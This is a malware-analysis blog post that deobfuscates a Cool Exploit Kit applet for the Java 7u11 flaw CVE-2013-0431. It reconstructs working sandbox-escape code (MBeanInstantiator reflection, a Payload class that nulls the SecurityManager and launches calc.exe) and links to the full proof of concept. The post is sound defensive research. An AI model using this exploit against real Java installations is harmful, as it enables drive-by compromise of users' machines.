Tuesday, February 26, 2013

Deobfuscating Java 7u11 Exploit from Cool Exploit Kit (CVE-2013-0431)

At the beginning of last week @EKWatcher spotted Cool Exploit Kit using the Java 7 update 11 vulnerability (CVE-2013-0431).


This vulnerability had already been reported by Security Explorations on seclists a few days after Oracle issued update 11.

I decided to take a look at it. I found a website infected by Cool EK that, after successful exploitation, dropped Reveton into the "C:\Documents and Settings\<username>\Application Data" folder on Windows XP.

The applet used by Cool EK was named would-blood.jar, and once opened with JD-GUI this was the result.


As you can see it's obfuscated, not heavily, but obfuscated. The first thing to do when you start deobfuscating an applet is to find the init() method, which is the "starting point" and cannot be renamed. Remember that for serialized applets the starting point is a method called start() instead of init().

The init function is inside the hw class.


It's immediately evident that all strings in init() are reversed: for example the first one is txetnoC.lanretni.tpircsavaj.allizom.gro.nus, which written backwards becomes sun.org.mozilla.javascript.internal.Context. As expected, the pah function reverses the string.

The next function called is bug.


The bug function obtains the MBeanInstantiator associated with the MBeanServer and calls rue2.


rue2 then uses reflection to invoke the method findClass, which finds and returns the specified class (sun.org.mozilla.javascript.internal.Context).

Considering this, we can remove the pah function and merge bug and rue2 into a single new function called gimmeClass.

private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
{
    Object obj = null;   // ClassLoader argument passed to findClass: null

    // Obtain an MBeanServer and its MBeanInstantiator (formerly done in bug).
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();

    // Invoke MBeanInstantiator.findClass through reflection (formerly done in rue2):
    // it resolves and returns the named class, e.g. sun.org.mozilla.javascript.internal.Context.
    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
}
Back to the init function: at line 76 the lot function is executed, and since it returns a Method object I suppose it is used to find a method.


As expected, its job is to search the declared methods of a class for one whose name equals the string s passed as a parameter. Instead of lot let's call it getMethod, which sounds clearer.

private Method getMethod(Class class1, String s, boolean flag)
{
    try {
        // Obtain the class's "declaredMethods" through the JMX Introspector
        // instead of calling getDeclaredMethods() directly.
        Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
        Method[] amethod1 = amethod;

        for (int i = 0; i < amethod1.length; i++) {
            Method method = amethod1[i];
            String s1 = method.getName();
            Class[] aclass = method.getParameterTypes();
            // Match by name (reference comparison, exactly as in the decompiled output);
            // when flag is set, only a method without parameters is accepted.
            if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
        }
    } catch (Exception localException) { }

    return null;
}
At line 77 the method found in the previous step is invoked. Lines 78 and 79 do the same thing as the previous lines. At line 82 a byte array (abyte0) is instantiated.


This instruction calls two methods, one from the getString4Popers class and one from codehex. Let's examine the first one, which is named one. After declaring sixteen strings (127 in total) and concatenating them, it calls another method named gouerpyftn from the BurkinoGoso class.


All these concatenated strings go as the parameter to gouerpyftn. As you can see from the picture below, the value of the string str becomes the value of the string str1 inside the gouerpyftn function.

str3 and str4 are garbage because they are never used. Instruction 13 uses reflection to call the method charAt of java.lang.String.

What the function does is the following (I will try to explain it through pseudocode):

// encodedString is paramString
encodedString = "F-Abr-rb((((((}g((Ar(-(((8((0r(8((}}((0F(^((0z(- ..."
// keyString is str1 (getString.getKkkk())
keyString = "b12gO6%oh3}lfs98^mYauL5{qiy)RKpk40(VXBrtW&DzCFA-JndU_eZwTNHc+7QMx*vIPSGE"

for ( i = 0; i < encodedString.length; i++ )
    c = encodedString.charAt(i)
    j = keyString.indexOf(c)

    if c is inside keyString
        if c is not in the first position
            take the char from keyString at position j-1
            concatenate it to finalString
        else
            take the char from keyString at position keyString.length-1
            concatenate it to finalString
    else
        take the char from encodedString at position i
        concatenate it to finalString
endfor

return finalString
At the end of this loop str2/finalString looks like this.


Looking at the first eight chars you can clearly understand what kind of string this is: CAFEBABE is the hexadecimal magic number at the start of every Java class file.

But we have a byte array (abyte0): in fact, as the name suggests, the method decodeH from the codehex class converts the hexadecimal string into a byte array.
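As an added example (not code from the original post), here is the decoding loop above reimplemented in Python, followed by the hex-to-bytes step that decodeH performs and a parse of the class-file header that the CAFEBABE magic introduces. The key string and the visible prefix of the encoded string are taken from the post; only the first 48 characters shown above are used, since the rest is elided there.

```python
import struct

# Substitution alphabet str1 (getString.getKkkk()) exactly as shown in the post.
KEY_STRING = "b12gO6%oh3}lfs98^mYauL5{qiy)RKpk40(VXBrtW&DzCFA-JndU_eZwTNHc+7QMx*vIPSGE"

# The visible prefix of the encoded string from the post (the remainder is elided there).
ENCODED_PREFIX = "F-Abr-rb((((((}g((Ar(-(((8((0r(8((}}((0F(^((0z(-"

# Class-file major versions and the Java release they correspond to.
JAVA_VERSIONS = {45: "1.1", 46: "1.2", 47: "1.3", 48: "1.4", 49: "5", 50: "6", 51: "7"}


def decode_string(encoded: str, key: str = KEY_STRING) -> str:
    """Reimplementation of gouerpyftn: every character found in the key is replaced
    by the character that precedes it in the key (position 0 wraps to the last
    position); characters that are not in the key are copied unchanged."""
    out = []
    for c in encoded:
        j = key.find(c)
        if j == -1:
            out.append(c)            # not in the alphabet: copied as-is
        elif j > 0:
            out.append(key[j - 1])   # previous character of the alphabet
        else:
            out.append(key[-1])      # position 0 wraps to the last character
    return "".join(out)


def hex_to_bytes(hexstr: str) -> bytes:
    """The role of codehex.decodeH: turn the decoded hex text into raw bytes."""
    if len(hexstr) % 2:
        raise ValueError("hex string has odd length")
    return bytes.fromhex(hexstr)


def parse_class_header(data: bytes) -> dict:
    """Read the fixed fields at the start of a Java class file: magic, minor and
    major version and constant-pool count (all big-endian, per the JVM spec)."""
    if len(data) < 10:
        raise ValueError("too short for a class file header")
    magic, minor, major, cp_count = struct.unpack(">IHHH", data[:10])
    return {
        "is_class_file": magic == 0xCAFEBABE,
        "minor": minor,
        "major": major,
        "java_version": JAVA_VERSIONS.get(major, "unknown"),
        "constant_pool_count": cp_count,
    }


def analyse_prefix(encoded: str = ENCODED_PREFIX) -> dict:
    """Decode the substitution, hex-decode the result and inspect the header."""
    decoded = decode_string(encoded)
    info = parse_class_header(hex_to_bytes(decoded))
    info["decoded_hex"] = decoded
    return info


if __name__ == "__main__":
    print(analyse_prefix())
```

The decoded prefix starts with CAFEBABE 00000032, i.e. a class file compiled for Java 6, followed by a constant-pool count of 0xFB; the same check on the full decoded string is what confirms the dumped newfile.class is a real class file.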

Lines 8 to 19 are again garbage added by the obfuscator, so we can remove them. To find out what code that class contains we have to write the bytes to a file called newfile.class and then try to open it with JD-GUI.
But JD-GUI failed to decompile the class file. I wasn't expecting this result; anyway, let's open it with WinHex.

This confirms that it is a class file. Switching to the "text display only" option you can clearly see what this class is supposed to do.


Scrolling down there is an interesting string.


This means that this class file has been obfuscated with Zelix KlassMaster 5.4.5, which was available from March 2011 to June 2011. I don't know whether Zelix fakes its version string during the obfuscation process, so I cannot be 100% sure about this.

Another interesting string is this one.

Now, how do we proceed? Let's try jad, which is another Java decompiler.


Most of the file has been decompiled successfully, but as you can see in the constructor it uses reflection to call a method of a class. Both names are encrypted with an XOR routine that is called from a static field initializer during class initialization.


Not good: some methods aren't properly decompiled. It seems that Zelix has been used with aggressive flow obfuscation; maybe this is why jad can't fully decompile it.

Searching Google for how to deobfuscate Zelix KlassMaster files, I found this great post by @robert_c_larsen which explains how to decrypt these strings. The first thing we need to do is disassemble our obfuscated file with jad in order to obtain only JVM instructions.


Now all we have to do is interpret these instructions. I will cover the most important parts; if you want a full overview I suggest you read Robert's post. The picture below shows that a string is pushed onto the stack and then passed to the decrypting subroutine.


The decrypting subroutine starts at instruction 132 by splitting the given string into a char array.


Next, an array of five elements is stored, and from instruction 184 to 204 five integers (which are the keys) are pushed onto the stack; then an XOR operation is performed.


Knowing this we can rebuild the code.
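As an added example (not the post's pastebin code), here is the shape of that decrypting subroutine in Python. The five keys in the post are not reproduced here, so KEYS and the SAMPLE string are constructed values, and the choice of key by character index modulo five is the usual Zelix KlassMaster layout, assumed here since the post only states that five keys are pushed and XORed.

```python
# Constructed keys (placeholders): the post's five integer keys are not reproduced here.
KEYS = (0x10, 0x20, 0x30, 0x40, 0x50)

# Constructed sample: "AccessController" encrypted with KEYS under the scheme below.
SAMPLE = "QCS%#cc_.$bO\\,5b"


def zkm_decrypt(encrypted: str, keys=KEYS) -> str:
    """XOR each character with one of the five keys, chosen by the character's
    index modulo 5 (assumed standard Zelix KlassMaster layout). Java chars are
    16-bit, so the result is masked to 0xFFFF. XOR is its own inverse, so the
    same routine also produces the encrypted form from the plaintext."""
    chars = list(encrypted)                 # the char array built at instruction 132
    for i, c in enumerate(chars):
        k = keys[i % len(keys)]             # key selected by position
        chars[i] = chr((ord(c) ^ k) & 0xFFFF)
    return "".join(chars)


def decrypt_all(strings, keys=KEYS) -> list:
    """Decrypt every constant-pool string a class pushes into the subroutine."""
    return [zkm_decrypt(s, keys) for s in strings]


if __name__ == "__main__":
    print(decrypt_all([SAMPLE]))
```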

For some strange reason the syntax highlighter doesn't allow me to paste this code here; I will investigate.

Link to pastebin

Run it and voilà, all strings are decrypted.

I've renamed javaRun to Payload.

public class Payload implements PrivilegedExceptionAction
{
    // Constructor: passes this object to AccessController.doPrivileged() through
    // reflection, so that run() below is executed in a privileged context.
    public Payload()
    {
        try
        {
            Class.forName("java.security.AccessController").getMethod("doPrivileged", new Class[] { Class.forName("java.security.PrivilegedExceptionAction")
            }).invoke(Class.forName("java.security.AccessController"), new Object[] {
                this
            });
        }
        catch (Exception exception) { }
    }

    // Executed by doPrivileged(): removing the SecurityManager disables the applet sandbox.
    public Object run() throws Exception
    {
        System.setSecurityManager(null);
        return null;
    }

    // Called once the sandbox is gone; the PoC just launches the calculator.
    public static void outSandbox() throws Exception
    {
        Runtime.getRuntime().exec("calc.exe");
    }
}
Instead of running the calculator inside the run function I chose to create another function called outSandbox to make it clearer.

Back to init(): the instructions at lines 84, 85 and 86 call the same methods we have already seen. Instruction 89 returns a string, apparently the path of the jar. Instructions 90 and 91 call the constructor of the Payload class and instantiate it.

I've modified the code a bit from the original version.

  Java 7u11 Exploit Source Code

Now we have finished, so let's test it out.

It works! This PoC can be improved, but I leave it as it is. Kafeine told me that there were some applets without obfuscation that I could have looked at instead of deobfuscating this one; the only thing I can say is: bad luck for me.

Hope you enjoyed.

If you want to read an analysis of this vulnerability, here is a post by Juan Vazquez from Rapid7.

87 comments:

  2. Nice analysis! Thank you.
  3. Nice Work!

    Especially thanks for the Zelix hint. Brought to an end my own analysis
    here

    @malforsec
  4. Hmm, good job! This is really something!